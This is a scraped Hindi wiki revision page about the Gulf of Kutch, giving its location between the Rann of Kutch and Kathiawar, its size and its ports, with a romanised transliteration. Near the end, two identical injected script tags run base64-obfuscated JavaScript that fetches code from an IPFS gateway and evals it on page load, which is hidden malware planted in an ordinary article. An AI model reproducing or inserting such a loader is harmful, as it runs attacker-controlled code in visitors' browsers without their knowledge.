Difference between revisions of "कच्छ की खाड़ी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''कच्छ की खाड़ी''' [[अरब सागर]] का पूर्वोत्तर हिस्सा है जो [[पश्चिम भारत|पश्चिमी]]-मध्य भारत के [[कच्छ के रण]] (लवणीय बंजर) व [[काठियावाड़]] प्रायद्वीप के बीच फैला है और [[गुजरात]] राज्य के [[कच्छ ज़िला|कच्छ ज़िले]] के दक्षिण में अवस्थित है।  
+
'''कच्छ की खाड़ी''' [[अरब सागर]] का पूर्वोत्तर हिस्सा है जो [[पश्चिम भारत|पश्चिमी]]-मध्य भारत के [[कच्छ के रण]] (लवणीय बंजर) व [[काठियावाड़]] प्रायद्वीप के बीच फैला है और [[गुजरात]] राज्य के [[कच्छ ज़िला|कच्छ ज़िले]] के दक्षिण में अवस्थित है।
 +
 
 
*पूर्व दिशा में लगभग 180 किमी तक फैली इस खाड़ी की चौड़ाई 16 से 65 किमी तक है।  
 
*पूर्व दिशा में लगभग 180 किमी तक फैली इस खाड़ी की चौड़ाई 16 से 65 किमी तक है।  
 
*इसके किनारे की भूमि दलदली व समतल है और इसके जल में कई छोटे-छोटे [[द्वीप]] उभरे हुए हैं।  
 
*इसके किनारे की भूमि दलदली व समतल है और इसके जल में कई छोटे-छोटे [[द्वीप]] उभरे हुए हैं।  
*खाड़ी के प्रवेश मार्ग के पास ओखा बंदरगाह स्थित है। अन्य बंदरगाहों में [[मांडवी]], बेदी और [[कांडला बंदरगाह|कांडला]] शामिल हैं।  
+
*खाड़ी के प्रवेश मार्ग के पास [[ओखा बन्दरगाह]] स्थित है। अन्य बंदरगाहों में [[मांडवी]], बेदी और [[कांडला बंदरगाह|कांडला]] शामिल हैं।  
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 12:24, 5 November 2014

kachchh ki kha di arab sagar ka poorvottar hissa hai jo pashchimi-madhy bharat ke kachchh ke ran (lavaniy banjar) v kathiyava d prayadvip ke bich phaila hai aur gujarat rajy ke kachchh zile ke dakshin mean avasthit hai.

  • poorv disha mean lagabhag 180 kimi tak phaili is kha di ki chau daee 16 se 65 kimi tak hai.
  • isake kinare ki bhoomi daladali v samatal hai aur isake jal mean kee chhote-chhote dvip ubhare hue haian.
  • kha di ke pravesh marg ke pas okha bandaragah sthit hai. any bandaragahoan mean maandavi, bedi aur kaandala shamil haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh